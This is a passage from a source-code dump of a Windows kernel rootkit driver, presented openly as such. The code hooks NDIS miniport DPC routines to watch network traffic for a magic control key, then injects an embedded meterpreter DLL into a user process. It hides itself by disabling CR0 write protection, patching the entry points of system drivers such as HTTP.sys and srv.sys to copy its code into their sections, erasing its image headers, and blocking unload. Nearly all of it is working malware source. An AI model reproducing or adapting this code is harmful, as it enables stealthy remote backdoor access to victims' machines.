DbgMsg(__FUNCTION__\"() ERROR: Some offsets are not initialized\\n\");\r\n return 0;\r\n }\r\n\r\n#endif // USE_PARANOID_CHEKS\r\n\r\n ULONG Hooked = 0;\r\n NDIS_HANDLE hBogusProtocol = BogusProtocolRegister();\r\n if (hBogusProtocol)\r\n {\r\n UNICODE_STRING usTcpIp;\r\n RtlInitUnicodeString(&usTcpIp, L\"TCPIP\");\r\n\r\n // lookup the 'TCPIP' protocol\r\n PVOID Protocol = NdisHookProtocolFind(hBogusProtocol, &usTcpIp);\r\n if (Protocol)\r\n {\r\n DbgMsg(__FUNCTION__\"(): \\\"TCPIP\\\" protocol address is \"IFMT\"\\n\", Protocol);\r\n\r\n // enumerate open miniports\r\n PVOID OpenBlock = NULL;\r\n while (OpenBlock = NdisHookProtocolEnumOpened(Protocol, OpenBlock))\r\n {\r\n // get miniport address\r\n PVOID Miniport = NdisHookOpenGetMiniport(OpenBlock);\r\n if (Miniport)\r\n {\r\n DbgMsg(__FUNCTION__\"(): Open block = \"IFMT\", Miniport = \"IFMT\"\\n\", OpenBlock, Miniport);\r\n\r\n // get _NDIS_INTERRUPT_BLOCK address\r\n PVOID InterruptEx = *(PVOID *)((PUCHAR)Miniport + NDIS_MINIPORT_BLOCK_InterruptEx);\r\n if (InterruptEx == NULL)\r\n {\r\n continue;\r\n }\r\n\r\n // change _NDIS_INTERRUPT_BLOCK::MiniportDpc routine address\r\n PVOID MiniportDpc = *(PVOID *)((PUCHAR)InterruptEx + NDIS_INTERRUPT_BLOCK_MiniportDpc);\r\n if (MiniportDpc == NULL)\r\n {\r\n continue;\r\n }\r\n\r\n // allocate trampoline for hook handler calling\r\n PVOID HookStruct = NdisHookAlloc(MiniportDpc, Miniport, RECALCULATE_POINTER(MiniportInterruptDPC));\r\n if (HookStruct)\r\n {\r\n // hook _NDIS_INTERRUPT_BLOCK::MiniportDpc\r\n *(PVOID *)((PUCHAR)InterruptEx + NDIS_INTERRUPT_BLOCK_MiniportDpc) = NdisHookAllocJump(MiniportDpc, HookStruct);\r\n\r\n DbgMsg(__FUNCTION__\"(): Hooking MiniportDpc: \"IFMT\" -> \"IFMT\"\\n\", MiniportDpc, HookStruct);\r\n\r\n Hooked += 1;\r\n }\r\n }\r\n }\r\n }\r\n else\r\n {\r\n DbgMsg(__FUNCTION__\"() ERROR: Unable to find \\\"TCPIP\\\" protocol\\n\");\r\n }\r\n\r\n BogusProtocolUnregister();\r\n }\r\n\r\n return Hooked;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n" }, { "path": "src/rootkit_driver/ndis_hook.h", "content": "\r\ntypedef void (NTAPI * NDIS_HOOK_BUFFER_HANDLER)(PVOID MiniportHandle, PVOID Buffer, ULONG Size);\r\n\r\nextern \"C\"\r\n{\r\n BOOLEAN NdisHookInitialize(NDIS_HOOK_BUFFER_HANDLER Handler);\r\n PVOID NdisHookProtocolFind(PVOID hBogusProtocol, PUNICODE_STRING usProtocol);\r\n PVOID NdisHookProtocolEnumOpened(PVOID Protocol, PVOID OpenBlock);\r\n PVOID NdisHookOpenGetMiniport(PVOID OpenBlock);\r\n PVOID NdisHookAlloc(PVOID OldHandler, PVOID OldHandlerContext, PVOID Handler);\r\n PVOID NdisHookAllocJump(PVOID Address, PVOID Destination);\r\n ULONG NdisHookSet(PUCHAR PointerFixup);\r\n};\r\n" }, { "path": "src/rootkit_driver/network.cpp", "content": "#include \"stdafx.h\"\r\n//--------------------------------------------------------------------------------------\r\nSHORT ChecksumEnd(ULONG Sum)\r\n{\r\n Sum = (Sum >> 16) + (Sum & 0xffff);\r\n Sum += (Sum >> 16);\r\n\r\n return (USHORT)(~Sum);\r\n}\r\n\r\n/*\r\n * Calculate checksum of a buffer.\r\n * @param Data Pointer to buffer with data.\r\n * @param Count Number of bytes in buffer.\r\n * @param Seed Previously calculated checksum (if any).\r\n * @return Checksum of buffer.\r\n */\r\nULONG ChecksumCompute(PVOID Data, int Count, ULONG Seed) \r\n{\r\n register ULONG Sum = Seed;\r\n\r\n while (Count > 1)\r\n {\r\n Sum += *(PUSHORT)Data;\r\n Count -= 2;\r\n Data = (PVOID)((PUCHAR)Data + 2);\r\n }\r\n\r\n /* Add left-over byte, if any */\r\n if (Count > 0)\r\n {\r\n Sum += *(PUCHAR)Data;\r\n }\r\n\r\n return Sum;\r\n}\r\n\r\nUSHORT Checksum(PVOID Data, int Count)\r\n{\r\n ULONG Sum = ChecksumCompute(Data, Count, 0);\r\n return ChecksumEnd(Sum);\r\n}\r\n//--------------------------------------------------------------------------------------\r\nchar *inet_ntoa(ULONG Addr)\r\n{\r\n static char buff[4 * sizeof(\"123\")];\r\n PUCHAR ucp = (PUCHAR)&Addr;\r\n\r\n sprintf(buff, \"%d.%d.%d.%d\",\r\n ucp[0] & 0xff,\r\n ucp[1] & 0xff,\r\n ucp[2] & 0xff,\r\n ucp[3] & 0xff);\r\n\r\n return buff;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n" }, { "path": "src/rootkit_driver/network.h", "content": "\r\n#define NET_MAC_ADDR_LEN 6\r\n\r\n#include \r\ntypedef struct _NET_ETH_HEADER\r\n{\r\n UCHAR Dst[NET_MAC_ADDR_LEN];\r\n UCHAR Src[NET_MAC_ADDR_LEN];\r\n USHORT Type;\r\n\r\n} NET_ETH_HEADER,\r\n*PNET_ETH_HEADER;\r\n#include \r\n\r\n#define ETH_P_IP\t0x0800\t\t/* Internet Protocol packet\t*/\r\n#define ETH_P_ARP\t0x0806\t\t/* Address Resolution packet\t*/\r\n\r\n#define ETH_IS_BCAST_ADDR(Addr) \\\r\n \\\r\n (((Addr)[0] == 0xff) && ((Addr)[1] == 0xff) && \\\r\n ((Addr)[2] == 0xff) && ((Addr)[3] == 0xff) && \\\r\n ((Addr)[4] == 0xff) && ((Addr)[5] == 0xff))\r\n\r\n\r\n#define ETH_MATCH_ADDR(Addr1, Addr2) \\\r\n \\\r\n (((Addr1)[0] == (Addr2)[0]) && ((Addr1)[1] == (Addr2)[1]) && \\\r\n ((Addr1)[2] == (Addr2)[2]) && ((Addr1)[3] == (Addr2)[3]) && \\\r\n ((Addr1)[4] == (Addr2)[4]) && ((Addr1)[5] == (Addr2)[5]))\r\n\r\n\r\n/* Standard well-defined IP protocols. */ \r\nenum \r\n{ \r\n IPPROTO_IP = 0, /* Dummy protocol for TCP */ \r\n IPPROTO_ICMP = 1, /* Internet Control Message Protocol */ \r\n IPPROTO_IGMP = 2, /* Internet Group Management Protocol */ \r\n IPPROTO_TCP = 6, /* Transmission Control Protocol */ \r\n IPPROTO_UDP = 17, /* User Datagram Protocol */ \r\n IPPROTO_SCTP = 132, /* Stream Control Transport Protocol */ \r\n IPPROTO_RAW = 255, /* Raw IP packets */ \r\n};\r\n\r\n#include \r\ntypedef struct _NET_IPv4_HEADER\r\n{\r\n UCHAR HeaderLength:4, Version:4;\r\n UCHAR TypeOfService;\r\n USHORT TotalLength;\r\n USHORT Id;\r\n USHORT FragmentOffset;\r\n UCHAR TimeToLive;\r\n UCHAR Protocol;\r\n USHORT Checksum;\r\n ULONG Src;\r\n ULONG Dst;\r\n\r\n} NET_IPv4_HEADER, \r\n*PNET_IPv4_HEADER;\r\n#include \r\n\r\n// unsigned long to TCP/IP network byte order\r\n#define HTONL(_a_) \\\r\n \\\r\n ((((_a_) & 0x000000FF) << 24) + \\\r\n (((_a_) & 0x0000FF00) << 8) + \\\r\n (((_a_) & 0x00FF0000) >> 8) + \\\r\n (((_a_) & 0xFF000000) >> 24))\r\n\r\n// unsigned short to TCP/IP network byte order\r\n#define HTONS(_a_) \\\r\n \\\r\n (((0x00FF & (_a_)) << 8) + \\\r\n ((0xFF00 & (_a_)) >> 8))\r\n\r\n\r\nSHORT ChecksumEnd(ULONG Sum);\r\nULONG ChecksumCompute(PVOID Data, int Count, ULONG Seed);\r\nUSHORT Checksum(PVOID Data, int Count);\r\nchar *inet_ntoa(ULONG Addr);\r\n" }, { "path": "src/rootkit_driver/post_build.bat", "content": "@echo off\r\nif exist ..\\rootkit_driver_debug.sys ..\\bin2c.exe ..\\rootkit_driver_debug.sys rootkit_driver > ..\\includes\\rootkit_driver_debug.sys.h\r\nif exist ..\\rootkit_driver.sys ..\\bin2c.exe ..\\rootkit_driver.sys rootkit_driver > ..\\includes\\rootkit_driver.sys.h\r\npause" }, { "path": "src/rootkit_driver/rootkit_driver.cpp", "content": "#include \"stdafx.h\"\r\n\r\n#pragma comment(linker,\"/MERGE:.rdata=.text\") \r\n#pragma comment(linker,\"/MERGE:.edata=.text\") \r\n\r\n#pragma section(\"INIT\",read,write,execute)\r\n\r\nextern \"C\"\r\n{ \r\n NTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath);\r\n void HookImageEntry(PVOID Image);\r\n BOOLEAN CheckForFreeArea(PVOID Image, PULONG FreeAreaRVA, PULONG FreeAreaLength);\r\n VOID LoadImageNotify(PUNICODE_STRING FullImageName, HANDLE ProcessId, PIMAGE_INFO ImageInfo);\r\n VOID DriverEntryInitializePayload(PUCHAR PointerFixup);\r\n};\r\n\r\n#pragma alloc_text(INIT, ClearWp)\r\n#pragma alloc_text(INIT, SetWp)\r\n#pragma alloc_text(INIT, NewDriverEntry)\r\n#pragma alloc_text(INIT, HookImageEntry)\r\n#pragma alloc_text(INIT, CheckForFreeArea)\r\n#pragma alloc_text(INIT, LoadImageNotify)\r\n#pragma alloc_text(INIT, DriverEntryInitializePayload)\r\n\r\n// user-mode DLL file\r\n#ifdef DBGMSG\r\n__declspec(allocate(\"INIT\"))\r\n#include \"../includes/meterpreter_debug.dll.h\"\r\n#else\r\n__declspec(allocate(\"INIT\"))\r\n#include \"../includes/meterpreter.dll.h\"\r\n#endif\r\n\r\n// defined in runtime.cpp\r\nextern PVOID m_DriverBase;\r\nULONG m_DriverSize = 0;\r\nBOOLEAN m_bDriverMustBeFreed = FALSE;\r\n\r\nULONG m_RkOffset = 0, m_RkSize = 0;\r\nPVOID m_FreeAreaFound = NULL;\r\n\r\n#define EP_PATCH_SIZE 6\r\nUCHAR m_EpOriginalBytes[EP_PATCH_SIZE];\r\nDRIVER_INITIALIZE *m_HookedEntry = NULL;\r\n\r\nPVOID m_Payload = NULL;\r\nULONG m_PayloadSize = 0;\r\n//--------------------------------------------------------------------------------------\r\nVOID InjectPayloadThread(PVOID Param)\r\n{\r\n if (m_Payload && m_PayloadSize > 0)\r\n {\r\n // inject user mode payload into the process\r\n InjectIntoProcessByName(METERPRETER_PROCESS, m_Payload, m_PayloadSize);\r\n }\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid NTAPI NdisHookHandleBuffer(PVOID MiniportHandle, PVOID Buffer, ULONG Size)\r\n{\r\n if (Size < sizeof(NET_ETH_HEADER) + sizeof(NET_IPv4_HEADER))\r\n {\r\n // buffer is too small\r\n return;\r\n }\r\n\r\n // check the ethernet header\r\n PNET_ETH_HEADER Eth = (PNET_ETH_HEADER)Buffer;\r\n if (Eth->Type != HTONS(ETH_P_IP))\r\n {\r\n // not a internet protocl packet\r\n return;\r\n }\r\n\r\n // check the IP header\r\n PNET_IPv4_HEADER Ip = (PNET_IPv4_HEADER)((PUCHAR)Eth + sizeof(NET_ETH_HEADER));\r\n\r\n if (Ip->Version != 4 || Ip->HeaderLength * 4 != sizeof(NET_IPv4_HEADER))\r\n {\r\n // not a IPv4 packet\r\n return;\r\n }\r\n\r\n if (Ip->Protocol != IPPROTO_ICMP && Ip->Protocol != IPPROTO_IP && Ip->Protocol != IPPROTO_UDP)\r\n {\r\n // unknown protocol\r\n return;\r\n }\r\n\r\n if (HTONS(Ip->TotalLength) + sizeof(NET_ETH_HEADER) > Size)\r\n {\r\n // total length out of bounds\r\n return;\r\n }\r\n\r\n // remember and reset checksum\r\n USHORT Sum = Ip->Checksum; Ip->Checksum = 0;\r\n\r\n // validate checksum\r\n if (Sum != Checksum(Ip, sizeof(NET_IPv4_HEADER)))\r\n {\r\n return;\r\n }\r\n\r\n char Dst[16], Src[16];\r\n strcpy(Dst, inet_ntoa(Ip->Dst)); \r\n strcpy(Src, inet_ntoa(Ip->Src)); \r\n\r\n DbgMsg(\r\n __FUNCTION__\"() IP: From = %s, To = %s, Protocol = %d, Length = %d\\n\",\r\n Src, Dst, Ip->Protocol, HTONS(Ip->TotalLength)\r\n );\r\n\r\n // find magic sequence in packet\r\n char *lpszMagic = \"RKCTL:\" ROOTKIT_CTL_KEY;\r\n for (ULONG i = 0; i < Size - strlen(lpszMagic); i++)\r\n {\r\n if (RtlCompareMemory((PUCHAR)Buffer + i, lpszMagic, strlen(lpszMagic)) == strlen(lpszMagic))\r\n {\r\n DbgMsg(__FUNCTION__\"(): Magic sequence has been find in network packet!\\n\");\r\n \r\n // we are at DPC level: create thread for execution of process injection code\r\n HANDLE hThread = NULL;\r\n NTSTATUS ns = PsCreateSystemThread(\r\n &hThread, \r\n THREAD_ALL_ACCESS, \r\n NULL, NULL, NULL, \r\n InjectPayloadThread, \r\n NULL\r\n );\r\n if (NT_SUCCESS(ns))\r\n {\r\n ZwClose(hThread);\r\n }\r\n else\r\n {\r\n DbgMsg(\"PsCreateSystemThread() fails: 0x%.8x\\n\", ns);\r\n }\r\n\r\n break;\r\n }\r\n } \r\n}\r\n//--------------------------------------------------------------------------------------\r\nVOID DriverEntryContinueThread(PVOID Param)\r\n{\r\n /**\r\n * Hidden rootkit code starts execution here.\r\n */\r\n\r\n LARGE_INTEGER Timeout = { 0 };\r\n Timeout.QuadPart = TIME_RELATIVE(TIME_SECONDS(3)); \r\n\r\n DbgPrint(__FUNCTION__\"(): Param = \"IFMT\"\\n\", Param);\r\n\r\n // initialize NDIS hook data handler\r\n NdisHookInitialize(NdisHookHandleBuffer);\r\n\r\n // initialize DLL injector\r\n InjectInitialize();\r\n\r\n KeDelayExecutionThread(KernelMode, FALSE, &Timeout);\r\n\r\n if (Param)\r\n {\r\n // free memory, that has been allocated for driver \r\n ExFreePool(Param);\r\n } \r\n\r\n#ifndef USE_STEALTH_IMAGE\r\n\r\n if (m_DriverBase)\r\n {\r\n PIMAGE_NT_HEADERS pHeaders = (PIMAGE_NT_HEADERS)\r\n ((PUCHAR)m_DriverBase + ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew);\r\n\r\n // erase image headers\r\n RtlZeroMemory(m_DriverBase, pHeaders->OptionalHeader.SizeOfHeaders);\r\n }\r\n\r\n#endif // USE_STEALTH_IMAGE \r\n\r\n#ifdef USE_GREETING_MESSAGE\r\n\r\n while (true)\r\n {\r\n DbgPrint(__FUNCTION__\"(): Commertial malware rootkits are sucks!\\n\");\r\n\r\n // sleep\r\n KeDelayExecutionThread(KernelMode, FALSE, &Timeout); \r\n }\r\n\r\n#endif // USE_GREETING_MESSAGE\r\n \r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid DriverEntryInitializePayload(PUCHAR PointerFixup)\r\n{\r\n /*\r\n Perform payload initialization here\r\n */\r\n \r\n NdisHookSet(PointerFixup);\r\n\r\n // allocate memory for payload in non-paged pool\r\n ULONG PayloadSize = sizeof(dll);\r\n PVOID Payload = ExAllocatePool(NonPagedPool, PayloadSize);\r\n if (Payload)\r\n {\r\n RtlCopyMemory(Payload, dll, sizeof(dll));\r\n\r\n PULONG pPayloadSize = (PULONG)RECALCULATE_POINTER(&m_PayloadSize);\r\n PVOID *pPayload = (PVOID *)RECALCULATE_POINTER(&m_Payload);\r\n\r\n *pPayloadSize = PayloadSize;\r\n *pPayload = Payload;\r\n }\r\n else\r\n {\r\n DbgMsg(\"ExAllocatePool() fails\\n\");\r\n }\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#ifdef _X86_\r\n//--------------------------------------------------------------------------------------\r\nvoid ClearWp(void)\r\n{\r\n // allow to execute the code only on the 1-st CPU\r\n KeSetSystemAffinityThread(0x00000001);\r\n\r\n __asm\r\n { \r\n mov eax, cr0 \r\n and eax, not 000010000h\r\n mov cr0, eax\r\n }\r\n}\r\n\r\nvoid SetWp(void)\r\n{\r\n __asm\r\n {\r\n mov eax, cr0\r\n or eax, 000010000h\r\n mov cr0, eax\r\n }\r\n}\r\n//--------------------------------------------------------------------------------------\r\n#endif // _X86_\r\n//--------------------------------------------------------------------------------------\r\nPVOID DoPointerFixup(PVOID Ptr, PUCHAR PointerFixup)\r\n{\r\n\r\n#ifdef USE_STEALTH_IMAGE\r\n\r\n if (m_DriverBase == NULL)\r\n {\r\n return Ptr;\r\n }\r\n\r\n return (PUCHAR)Ptr - (PUCHAR)m_DriverBase + PointerFixup;\r\n\r\n#else // USE_STEALTH_IMAGE\r\n\r\n return Ptr;\r\n\r\n#endif //USE_STEALTH_IMAGE\r\n\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNTSTATUS NewDriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)\r\n{ \r\n // disable memory write protection\r\n ClearWp();\r\n\r\n // restore original code from image entry point\r\n memcpy(m_HookedEntry, m_EpOriginalBytes, EP_PATCH_SIZE);\r\n\r\n // enable memory write protection\r\n SetWp();\r\n\r\n NTSTATUS ns = m_HookedEntry(DriverObject, RegistryPath);\r\n DbgMsg(__FUNCTION__\"(): Hooked driver returns 0x%.8x\\n\", ns); \r\n\r\n if (PsRemoveLoadImageNotifyRoutine(LoadImageNotify) == STATUS_SUCCESS)\r\n {\r\n m_bDriverMustBeFreed = TRUE;\r\n }\r\n\r\n if (NT_SUCCESS(ns))\r\n {\r\n PVOID Image = ExAllocatePool(NonPagedPool, m_DriverSize);\r\n if (Image)\r\n {\r\n // prepare rootkit code for injection into the discardable sections\r\n memcpy(Image, m_DriverBase, m_DriverSize);\r\n RuntimeProcessRelocs(Image, (PVOID)((PUCHAR)m_FreeAreaFound - m_RkOffset));\r\n\r\n // disable memory write protection\r\n ClearWp();\r\n\r\n memcpy(m_FreeAreaFound, RVATOVA(Image, m_RkOffset), m_RkSize);\r\n\r\n // enable memory write protection\r\n SetWp();\r\n\r\n PUCHAR PointerFixup = (PUCHAR)m_FreeAreaFound - m_RkOffset;\r\n\r\n // set up NDIS hooks\r\n DriverEntryInitializePayload(PointerFixup);\r\n\r\n PKSTART_ROUTINE Start = (PKSTART_ROUTINE)RECALCULATE_POINTER(DriverEntryContinueThread);\r\n\r\n DbgMsg(__FUNCTION__\"(): Start address: \"IFMT\"\\n\", Start);\r\n\r\n // create thread for execution copied code\r\n HANDLE hThread = NULL;\r\n ns = PsCreateSystemThread(\r\n &hThread, \r\n THREAD_ALL_ACCESS, \r\n NULL, NULL, NULL, \r\n Start, \r\n m_bDriverMustBeFreed ? m_DriverBase : NULL\r\n );\r\n if (NT_SUCCESS(ns))\r\n {\r\n ZwClose(hThread);\r\n }\r\n else\r\n {\r\n DbgMsg(\"PsCreateSystemThread() fails: 0x%.8x\\n\", ns);\r\n }\r\n\r\n ExFreePool(Image);\r\n }\r\n\r\n // don't allow to unload target driver\r\n DriverObject->DriverUnload = NULL;\r\n }\r\n\r\n return ns;\r\n}\r\n//--------------------------------------------------------------------------------------\r\nvoid HookImageEntry(PVOID Image)\r\n{\r\n PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n PUCHAR Entry = (PUCHAR)RVATOVA(Image, pHeaders->OptionalHeader.AddressOfEntryPoint);\r\n\r\n // save original code from image entry point\r\n memcpy(m_EpOriginalBytes, Entry, EP_PATCH_SIZE);\r\n m_HookedEntry = (DRIVER_INITIALIZE *)Entry;\r\n\r\n // disable memory write protection\r\n ClearWp();\r\n\r\n#ifdef _X86_\r\n\r\n // patch image entry point\r\n *(PUCHAR)(Entry + 0) = 0x68;\r\n *(PVOID*)(Entry + 1) = NewDriverEntry;\r\n *(PUCHAR)(Entry + 5) = 0xC3;\r\n\r\n#else // _X86_\r\n\r\n#error __FUNCTION__ is x86 only\r\n\r\n#endif // _X86_\r\n\r\n // enable memory write protection\r\n SetWp();\r\n\r\n DbgMsg( \r\n __FUNCTION__\"(): Image entry point hooked (\"IFMT\" -> \"IFMT\")\\n\",\r\n Entry, NewDriverEntry\r\n );\r\n}\r\n//--------------------------------------------------------------------------------------\r\nBOOLEAN CheckForFreeArea(PVOID Image, PULONG FreeAreaRVA, PULONG FreeAreaLength)\r\n{\r\n *FreeAreaRVA = NULL;\r\n *FreeAreaLength = 0;\r\n\r\n PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)\r\n ((PUCHAR)Image + ((PIMAGE_DOS_HEADER)Image)->e_lfanew);\r\n\r\n PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)\r\n (pHeaders->FileHeader.SizeOfOptionalHeader + \r\n (PUCHAR)&pHeaders->OptionalHeader);\r\n\r\n ULONG AreaRVA = NULL;\r\n ULONG AreaLength = 0;\r\n\r\n // enumerate image sections\r\n for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)\r\n { \r\n PVOID SectionVa = RVATOVA(Image, pSection->VirtualAddress);\r\n char szSectionName[IMAGE_SIZEOF_SHORT_NAME + 1];\r\n\r\n // check for discardable attribute\r\n if ((pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE) &&\r\n my_strcmp(szSectionName, \"INIT\"))\r\n { \r\n if (AreaRVA && pSection->VirtualAddress == AreaRVA + AreaLength)\r\n {\r\n // concatenate with the previously found section\r\n AreaLength += MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment);\r\n }\r\n else\r\n {\r\n AreaRVA = pSection->VirtualAddress;\r\n AreaLength = MY_ALIGN_UP(pSection->Misc.VirtualSize, pHeaders->OptionalHeader.SectionAlignment);\r\n } \r\n }\r\n\r\n pSection += 1;\r\n }\r\n\r\n if (AreaLength >= m_RkSize)\r\n {\r\n DbgMsg(\"%d free bytes at 0x%.8x\\n\", AreaLength, AreaRVA);\r\n\r\n *FreeAreaRVA = AreaRVA;\r\n *FreeAreaLength = AreaLength;\r\n\r\n pSection = (PIMAGE_SECTION_HEADER)\r\n (pHeaders->FileHeader.SizeOfOptionalHeader + \r\n (PUCHAR)&pHeaders->OptionalHeader);\r\n\r\n // erase discardable flag\r\n for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)\r\n {\r\n pSection->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE;\r\n pSection += 1;\r\n }\r\n\r\n return TRUE;\r\n } \r\n\r\n return FALSE;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n/*\r\nkd> kb\r\nChildEBP RetAddr Args to Child \r\nf8afdaa8 805c62ae f8afdcf0 00000000 f8afdb44 DrvHide!LoadImageNotify+0x10\r\nf8afdac8 805a4159 f8afdcf0 00000000 f8afdb44 nt!PsCallImageNotifyRoutines+0x36\r\nf8afdc6c 80576483 f8afdcf0 00000000 00000000 nt!MmLoadSystemImage+0x9e5\r\nf8afdd4c 8057688f 80000378 00000001 00000000 nt!IopLoadDriver+0x371\r\nf8afdd74 80534c02 80000378 00000000 823c63c8 nt!IopLoadUnloadDriver+0x45\r\nf8afddac 805c6160 b286ecf4 00000000 00000000 nt!ExpWorkerThread+0x100\r\nf8afdddc 80541dd2 80534b02 00000001 00000000 nt!PspSystemThreadStartup+0x34\r\n00000000 00000000 00000000 00000000 00000000 nt!KiThreadStartup+0x16\r\n*/\r\n\r\n// images for storing malicious code\r\nPWSTR m_Images[] = \r\n{\r\n L\"\\\\HTTP.sys\",\r\n L\"\\\\mrxsmb.sys\",\r\n L\"\\\\mrxsmb10.sys\",\r\n L\"\\\\mrxsmb20.sys\",\r\n L\"\\\\srv.sys\",\r\n L\"\\\\srv2.sys\",\r\n L\"\\\\secdrv.sys\"\r\n};\r\n\r\nVOID LoadImageNotify(\r\n PUNICODE_STRING FullImageName,\r\n HANDLE ProcessId, // where image is mapped\r\n PIMAGE_INFO ImageInfo)\r\n{\r\n if (m_FreeAreaFound)\r\n {\r\n return;\r\n }\r\n\r\n // check for kernel driver\r\n if (ProcessId == 0 && ImageInfo->SystemModeImage)\r\n { \r\n BOOLEAN bImageFound = FALSE;\r\n PVOID TargetImageBase = ImageInfo->ImageBase;\r\n ULONG TargetImageSize = ImageInfo->ImageSize;\r\n\r\n DbgMsg(\r\n __FUNCTION__\"(): '%wZ' is at \"IFMT\", size=%d\\n\", \r\n FullImageName, TargetImageBase, TargetImageSize\r\n );\r\n\r\n // check for the known image\r\n for (ULONG i = 0; i < sizeof(m_Images) / sizeof(PWSTR); i++)\r\n {\r\n UNICODE_STRING usName;\r\n RtlInitUnicodeString(&usName, m_Images[i]);\r\n\r\n if (EqualUnicodeString_r(FullImageName, &usName, TRUE))\r\n {\r\n bImageFound = TRUE;\r\n break;\r\n }\r\n }\r\n\r\n if (bImageFound)\r\n {\r\n // check for the free space in image discardable sections\r\n ULONG FreeAreaRVA = 0, FreeAreaLength = 0;\r\n if (CheckForFreeArea(TargetImageBase, &FreeAreaRVA, &FreeAreaLength))\r\n {\r\n // copy malicious code into this image\r\n m_FreeAreaFound = RVATOVA(TargetImageBase, FreeAreaRVA);\r\n HookImageEntry(TargetImageBase);\r\n }\r\n } \r\n }\r\n}\r\n//--------------------------------------------------------------------------------------\r\nNTSTATUS \r\nNTAPI\r\nDriverEntry(\r\n PDRIVER_OBJECT DriverObject,\r\n PUNICODE_STRING RegistryPath)\r\n{\r\n if (!RuntimeInitialize(DriverObject, RegistryPath))\r\n {\r\n return STATUS_UNSUCCESSFUL;\r\n }\r\n\r\n DbgMsg(__FUNCTION__\"(): Loaded at \"IFMT\"\\n\", m_DriverBase);\r\n\r\n // initialize NDIS structures offsets\r\n NdisHookInitialize(NULL);\r\n\r\n#ifdef USE_STEALTH_IMAGE\r\n\r\n if (m_DriverBase == NULL)\r\n {\r\n return STATUS_UNSUCCESSFUL;\r\n }\r\n\r\n PIMAGE_NT_HEADERS32 pHeaders = (PIMAGE_NT_HEADERS32)((PUCHAR)m_DriverBase + \r\n ((PIMAGE_DOS_HEADER)m_DriverBase)->e_lfanew);\r\n\r\n PIMAGE_SECTION_HEADER pSection = (PIMAGE_SECTION_HEADER)\r\n (pHeaders->FileHeader.SizeOfOptionalHeader + \r\n (PUCHAR)&pHeaders->OptionalHeader);\r\n\r\n // calculate size, that require for rootkit code\r\n for (ULONG i = 0; i < pHeaders->FileHeader.NumberOfSections; i++)\r\n { \r\n if (m_RkOffset == 0)\r\n {\r\n m_RkOffset = pSection->VirtualAddress;\r\n }\r\n\r\n if (pSection->Characteristics & IMAGE_SCN_MEM_DISCARDABLE)\r\n {\r\n // erase discardable flag from our driver sections\r\n pSection->Characteristics &= ~IMAGE_SCN_MEM_DISCARDABLE;\r\n }\r\n else\r\n {\r\n m_RkSize += MY_ALIGN_UP(\r\n pSection->Misc.VirtualSize, \r\n pHeaders->OptionalHeader.SectionAlignment\r\n );\r\n }\r\n \r\n pSection += 1;\r\n }\r\n\r\n DbgMsg(\"Rootkit code: 0x%x bytes from 0x%.8x\\n\", m_RkSize, m_RkOffset);\r\n\r\n // to deal with ProcessRelocs()\r\n pHeaders->OptionalHeader.ImageBase = (ULONG)m_DriverBase;\r\n m_DriverSize = pHeaders->OptionalHeader.SizeOfImage;\r\n\r\n NTSTATUS ns = PsSetLoadImageNotifyRoutine(LoadImageNotify);\r\n if (!NT_SUCCESS(ns))\r\n {\r\n DbgMsg(\"PsSetLoadImageNotifyRoutine() fails: 0x%.8x\\n\", ns);\r\n }\r\n\r\n#else // USE_STEALTH_IMAGE\r\n\r\n DriverEntryInitializePayload(NULL); \r\n\r\n HANDLE hThread = NULL;\r\n NTSTATUS ns = PsCreateSystemThread(\r\n &hThread, \r\n THREAD_ALL_ACCESS, \r\n NULL, NULL, NULL, \r\n DriverEntryContinueThread, \r\n NULL\r\n );\r\n if (NT_SUCCESS(ns))\r\n {\r\n ZwClose(hThread);\r\n }\r\n else\r\n {\r\n DbgMsg(\"PsCreateSystemThread() fails: 0x%.8x\\n\", ns);\r\n }\r\n\r\n#endif // USE_STEALTH_IMAGE\r\n\r\n return STATUS_SUCCESS;\r\n}\r\n//--------------------------------------------------------------------------------------\r\n// EoF\r\n" }, { "path": "src/rootkit_driver/rootkit_driver.def", "content": "" }, { "path": "src/rootkit_driver/rootkit_driver.h", "content": "\r\nextern \"C\"\r\n{\r\n void ClearWp(void);\r\n void SetWp(void);\r\n\r\n PVOID DoPointerFixup(PVOID Ptr, PUCHAR PointerFixup);\r\n}\r\n\r\n#define RECALCULATE_POINTER(_ptr_) DoPointerFixup((PVOID)(_ptr_), PointerFixup)\r\n" }, { "path": "src/rootkit_driver/rootkit_driver.vcproj", "content": 